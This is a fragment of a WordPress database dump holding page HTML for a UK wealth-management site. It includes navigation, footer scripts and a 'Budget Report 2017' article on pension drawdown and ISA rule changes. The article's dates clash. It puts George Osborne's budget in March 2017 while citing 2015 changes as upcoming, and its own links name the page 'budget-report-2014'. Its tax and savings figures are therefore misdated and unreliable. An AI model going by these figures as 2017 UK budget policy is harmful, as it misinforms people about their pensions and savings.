class=\"textwidget\">\r\n<div class=\"tel\">Or call us on</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n<!-- end #content-sidebar-wrap -->\r\n<div class=\"after_content_sidebar_wrap\">\r\n<div id=\"text-5\" class=\"widget widget_text\">\r\n<div class=\"widget-wrap\">\r\n<div class=\"textwidget\">\r\n<div class=\"preferred-providers\">A few of our preferred providers</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n<!-- end .after_content_sidebar_wrap -->\r\n\r\n</div>\r\n<!-- end .wrap -->\r\n\r\n</div>\r\n<!-- end #inner -->\r\n<div id=\"footer\" class=\"footer\">\r\n<div class=\"wrap\">\r\n<div id=\"footer-nav\">\r\n\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/\">Wealth Management</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/about-us/frequently-asked-questions\">FAQs</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/about-us/testimonials\">Testimonials</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/privacy-policy\">Privacy Policy</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/wealth-management-glossary\">Glossary of Wealth Management Terms</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"/site-map\">Site map</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li><a href=\"https://rsr.wrapadviser.co.uk/\">Login</a></li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"creds\">\r\n\r\n© Copyright 2017 Equity SMART\r\n\r\n</div>\r\n</div>\r\n<!-- end .wrap -->\r\n\r\n</div>\r\n<!-- end #footer -->\r\n\r\n</div>\r\n<!-- end #wrap -->\r\n<script type=\"text/javascript\"><![CDATA[jQuery(document).ready(function($) {$(\".myController\").jFlow({controller: \".jFlowControl\",slideWrapper : \"#jFlowSlider\",slides: \"#slides\",selectedWrapper: \"jFlowSelected\",width: \"870px\",height: \"400px\",timer: 6000,duration: 1000,loop: 1,effect: \"right\",prev: \".slider-previous\",next: \".slider-next\",auto: true});});]]></script><script type=\"text/javascript\"><![CDATA[ var addthis_config = {\"data_track_clickback\":false,\"data_track_addressbar\":false,\"data_track_textcopy\":false}; ]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/q-and-a/js/qa.js\"></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/jquery.form.js\"></script><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"></script><script type=\"text/javascript\" src=\"/wp-content/themes/genesis/lib/js/menu/superfish.js\"></script><script type=\"text/javascript\" src=\"/wp-content/themes/genesis/lib/js/menu/superfish.args.js\"></script><script type=\"text/javascript\" src=\"/wp-content/plugins/genesis-slider/js/jflow.plus.js\"></script><!--wp_footer-->','Asset Protection','Did you know that 1 in 3 women & 1 in 4 men over 65 will go into care? And the Council can take all your assets - including your house - to pay for it?','inherit','closed','closed','','49-revision-v1','','','2017-09-21 16:56:19','2017-09-21 16:56:19','',49,'http://www.equalitywalk.org.uk/49-revision-v1',0,'revision','',0),(297,1,'2017-09-21 16:56:33','2017-09-21 16:56:33','<div id=\"textdiv\">\r\n\r\nWith so many different types of <a href=\"/investments\">savings &amp; investments</a> it’s wise to seek advice, we can offer advice on <a href=\"offshore-bonds\">offshore bonds</a>, <a href=\"isas\">ISA\'s</a> and much more...\r\nsavings &amp; investments &gt;&gt;\r\n\r\n</div>\r\n<div id=\"textdiv2\">\r\n\r\nAt Equity SMART we are experts in all areas of Pension Planning, including: <a href=\"/pensions/sipps\">SIPPs</a>, <a href=\"/pensions/pension-release\">Pension Release</a>, and of course <a href=\"/\">Personal Pension Planning</a>.\r\n\r\n<a href=\"/pension\">pensions</a> &gt;&gt;\r\n\r\n</div>\r\n&nbsp;\r\n<div id=\"textdiv2\">Find out more about <a href=\"/asset-protection\">Asset Protection Trusts,</a> <a href=\"/discretionary-trusts\">Discretionary Trusts</a>, <a href=\"/absolute-trust\">Absolute Trusts</a> and <a href=\"/wills-trust\">Wills</a> at Equity SMART.\r\n\r\nWe’ll make sure you get the right advice.\r\ntrusts &amp; protection &gt;&gt;\r\n\r\n</div>','Wealth Management - Financial Advice and Information','Equity SMART are experts in wealth management and financial advice.  Our highly experienced wealth managers provide you with specialist advice on managing your finances.','inherit','closed','closed','','64-revision-v1','','','2017-09-21 16:56:33','2017-09-21 16:56:33','',64,'http://www.equalitywalk.org.uk/64-revision-v1',0,'revision','',0),(298,1,'2017-09-21 16:57:23','2017-09-21 16:57:23','','Wealth Management','','publish','closed','closed','','wealth-management','','','2017-09-21 17:26:21','2017-09-21 17:26:21','',0,'http://www.equalitywalk.org.uk/?p=298',6,'nav_menu_item','',0),(299,1,'2017-09-21 16:57:23','2017-09-21 16:57:23',' ','Glossary','','publish','closed','closed','','glossary','','','2017-09-21 17:26:21','2017-09-21 17:26:21','',0,'http://www.equalitywalk.org.uk/?p=299',7,'nav_menu_item','',0),(300,1,'2017-09-21 16:57:23','2017-09-21 16:57:23',' ','','','publish','closed','closed','','300','','','2017-09-21 17:26:21','2017-09-21 17:26:21','',0,'http://www.equalitywalk.org.uk/?p=300',8,'nav_menu_item','',0),(301,1,'2017-09-21 16:58:38','2017-09-21 16:58:38','<body class=\"single single-post postid-7938 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Budget Report 2017										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li>Budget Report 2017</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"full-width\" style=\"width:100%\">&#13;\n										<div id=\"post-7938\" class=\"post-7938 post type-post status-publish format-standard has-post-thumbnail hentry category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">Budget Report 2017</span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h2><a href=\"#\"/></h2>&#13;\n<h2/>&#13;\n<h2>Fast Facts</h2>&#13;\n<p>From 27 March:<br/><span style=\"line-height: 1.5em;\">The capped drawdown Government Actuary’s Department (GAD) limit will be increased from </span><strong style=\"line-height: 1.5em;\">120% to 150%<span style=\"line-height: 1.5em;\">.</span></strong></p>&#13;\n<p>The minimum income requirement for accessing flexible drawdown will be reduced from £20,000 to £12,000. </p>&#13;\n<p>The amount for small individual pension pots that can be taken as a lump sum (regardless of total pension wealth) will increase from £2,000 to £10,000, and individuals will be able to take 3 individual pension pots as lump sums (previously only 2 allowed).</p>&#13;\n<p>The total pension wealth that people can have before they are no longer entitled to receive lump sums under trivial commutation rules will increase from £18,000 to £30,000.</p>&#13;\n<p>From 1 July 2017:</p>&#13;\n<p>The ISA limit will be increased to £15,000.</p>&#13;\n<p>From January 2015:<br/>&#13;\nNational Savings &amp; Investments will be offering a 1yr pensioner bond that is expected to pay 2.8% and a 3yr pensioner bond that will be paying 4%. Maximum investment £10,000.</p>&#13;\n<p> From 6 April 2015:<br/>&#13;\n Unlimited access to pension funds from age 55 with 25% tax free and the remainder at marginal rates of income tax.</p>&#13;\n<p>Age 55 rules proposed to be linked to State Pension Age by introducing the minimum age as SPA minus 10 years.</p>&#13;\n<p>All individuals with defined contribution pension pots are offered free and impartial face-to-face guidance at the point of retirement and will make available up to £20 million in the next 2 years to develop this initiative.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span9 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h1>If Carlsberg Were to do Budgets it Would Probably Look Something Like this!</h1>&#13;\n<h2> “A Budget for Makers, Do-ers and (above all) Savers.”</h2>&#13;\n<p><span style=\"font-size: 1.5em; line-height: 1.5em;\"><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/></span></p>&#13;\n<p>When George Osborne stood up to deliver his Budget speech in March 2017 the UK was teetering on the brink of a triple-dip recession. A year on, the economic picture looked radically different.</p>&#13;\n<p/>&#13;\n<p>Growth forecasts were being continually revised upwards and Osborne was able to confirm in his speech that the Office for Budget Responsibility (OBR) expected growth for 2017 to be 2.7% – meaning that the UK was now <span style=\"text-decoration: underline;\">growing faster</span> than all its major competitors.</p>&#13;\n<p/>&#13;\n<p>Not that anyone expected any giveaways in the Budget. Despite the fact that the Conservatives were trailing UKIP in the polls for the European elections and Labour in the general election polls, Osborne was playing the ‘economic competence’ card.</p>&#13;\n<p/>&#13;\n<p>He was the person best suited to guide Britain’s gradual recovery and as he rose to speak at 12:33pm, all the pundits expected him to confirm that. It would be a ‘steady as you go’ Budget, <span style=\"text-decoration: underline;\">with no major surprises.</span></p>&#13;\n<p/>&#13;\n<p>How wrong they were. The Chancellor leapt to his feet, announced that it would be a Budget for “makers, do-ers and savers” and spent the next 55 minutes reeling off a list of surprises.</p>&#13;\n<p/>&#13;\n<p>As far as our clients are concerned, the big news came with a radical overhaul of pensions – “the biggest changes since 1921” according to the Chancellor – and major alterations to the rules governing Individual Savings Accounts.</p>&#13;\n<p/>&#13;\n<p>We’ve detailed the major changes below, but we cannot stress too highly that the changes introduced by the Chancellor were radical and far-reaching and will have implications for the financial planning of most of our clients.</p>&#13;\n<p>If you have any questions at all on the Budget, or you’re unsure how the changes will affect you, don’t hesitate to get in touch with us. <a title=\"Get in Touch\" href=\"../contact-us/\">Click here</a></p>&#13;\n<p/>&#13;\n<h1 style=\"text-align: center;\"><b>Pensions</b></h1>&#13;\n<p/>&#13;\n<p>The key words when George Osborne spoke about pensions were “trust” and “flexibility.” He will be consulting on his proposed changes, but there is no reason to suppose they won’t go ahead, and they could be in force as early as next year.</p>&#13;\n<p/>&#13;\n<p>The changes will give those with a pension more flexibility and choice than they’ve ever had before – but the changes will also bring with them a need for advice, both when the pension is taken and as income continues to be taken from the pension.</p>&#13;\n<p/>&#13;\n<ul><li>&#13;\n<p>If the proposed changes go ahead, then anyone of pension age will be able to draw as much (or as little) from their pension pot as they so choose.</p>&#13;\n</li>&#13;\n</ul><ul><li>&#13;\n<p>If they choose to draw more than 25% of the fund then the first 25% will be tax free, with the balance taxed as income in the year it is taken.</p>&#13;\n</li>&#13;\n</ul><p/>&#13;\n<p>This is a clear indication of George Osborne’s intention to trust savers: despite one Government minister glibly commenting, <em>“We don’t care if they take it all and buy a Lamborghini”</em> the clear expectation is that pensioners will behave responsibly – but enjoy the flexibility to take income as their need for it dictates.</p>&#13;\n<p/>&#13;\n<p>Pensions have had a bad press of late. <em>“Why should I save in a pension when the annuity rates are so low”</em> is a phrase we’ve heard countless times in our offices. With these proposed changes we believe that savers will “re-discover” pensions – that they’ll once again be seen as an attractive savings vehicle.</p>&#13;\n<p/>&#13;\n<h2><i>Boost for Drawdown users</i></h2>&#13;\n<p>As above, the more far reaching changes are subject to consultation. There were however, two immediate pieces of good news for drawdown users which are effective almost immediately:</p>&#13;\n<ul><li>&#13;\n<p>Capped income drawdown – the limit is increased from 120% of GAD to 150% for income years starting after March 26<sup>th.</sup></p>&#13;\n</li>&#13;\n</ul><ul><li>&#13;\n<p>Flexible income drawdown – the yearly secured income needed to meet the ‘minimum income requirement’ is cut from £20,000 to £12,000 for anyone applying to start flexible drawdown after March 26<sup>th</sup></p>&#13;\n</li>&#13;\n</ul><p/>&#13;\n<p>These changes give drawdown users much more flexibility – but again, they have financial planning implications so if you have any questions, ask us by. <a title=\"Contact Us\" href=\"../contact-us/\">Just Clicking Here</a></p>&#13;\n<p><i style=\"font-size: 1.17em; line-height: 1.5em;\">Other pensions changes</i></p>&#13;\n<p>There were several other pensions changes designed to give people more control and more flexibility. The triviality limit (which allows people with small pension pots to take all the money as cash) has been extended from £18,000 to £30,000, and the Chancellor is also consulting on the 55% death benefits charge which previously applied to drawdown.</p>&#13;\n<p>It was always felt that this high rate of tax was unfair and the Government have recognised the need to have a tax system where pension savers are not penalised by only taking what they need from their pension fund.</p>&#13;\n<p> </p>&#13;\n<h1 style=\"text-align: center;\"><b>The Changes to Savings</b></h1>&#13;\n<p/>&#13;\n<p><i>ISAs – or NISAs as we must learn to call them…</i><i> </i></p>&#13;\n<p>Again catching everyone by surprise, the Chancellor introduced a major overhaul of the rules governing Individual Savings Accounts (ISAs).</p>&#13;\n<p>The annual limit is increased from £11,520 to £15,000 and there will no longer be a lower cap on the amount that can be saved in a cash ISA – allowing clients to save up to £15,000 in any combination between a cash ISA and a stocks &amp; shares ISA.</p>&#13;\n<p>…Except it won’t be an ISA any more: the new product will be known as a New ISA. Much NISA.</p>&#13;\n<p>The limit that can be saved in a Junior ISA and the Child Trust Fund is also going up, from £3,840 to £4,000.</p>&#13;\n<p>All these changes come into effect from July 1<sup>st</sup> and are clearly intended – again – to give savers more choice and control. But in the current climate of low interest rates the temptation to opt for the security of cash ISA may not be best for all savers.</p>&#13;\n<h2/>&#13;\n<h1 style=\"text-align: center;\"><b>National Savings</b></h1>&#13;\n<p/>&#13;\n<p>George Osborne also boosted National Savings, with the limit on what can be invested in premium bonds going from £30,000 to £40,000 in June 2017 and to £50,000 in 2015/16.</p>&#13;\n<p>He also introduced two Pensioner Bonds, with an indicative rate of 2.8% gross/AER for the one year bond and 4% gross/AER for the three year bond. How attractive these will be remains to be seen as there is a £10,000 limit for each bond and the interest will be taxable.</p>&#13;\n<h2><b>Conclusions</b></h2>&#13;\n<p>All in all it was a dramatic Budget – but one which we welcome.</p>&#13;\n<p>There is no doubt at all the people in receipt of pension income need flexibility. Largely dependent on your health, your need for income in retirement can vary significantly from year to year: the proposed changes will address this.</p>&#13;\n<p>However, there will be a need for more independent advice – and as we suggested above, that advice will need to be ongoing throughout the life of the pension.</p>&#13;\n<p>George Osborne’s changes to pensions and savings are significant and likely to impact on most people’s financial planning. We’re happy to discuss how they will affect you.</p>&#13;\n<p>If you’d like to discuss what the effect is on your pensions and savings, then just drop me an email to paul.reynolds@equalitywalk.org.uk or complete the Contact Form <span style=\"color: #0000ff;\"><a href=\"../contact-us/\"><span style=\"color: #0000ff;\">HERE.</span></a></span><span style=\"font-size: 14px; line-height: 1.5em;\"> </span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../budget-report-2014/\" title=\"Comment on Budget Report 2014\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/budget-report-2014/&amp;p[title]=Budget%20Report%202014\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Budget+Report+2014%20http://www.equalitywalk.org.uk/budget-report-2014/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/budget-report-2014/&amp;title=Budget%20Report%202014\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/budget-report-2014/&amp;title=Budget%20Report%202014\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fbudget-report-2014%2F&amp;name=Budget+Report+2014&amp;description=The+Chancellor+leapt+to+his+feet%2C+announced+that+it+would+be+a+Budget+for+%E2%80%9Cmakers%2C+do-ers+and+savers%E2%80%9D+and+spent+the+next+55+minutes+reeling+off+a+list+of+surprises...\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/budget-report-2014/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li 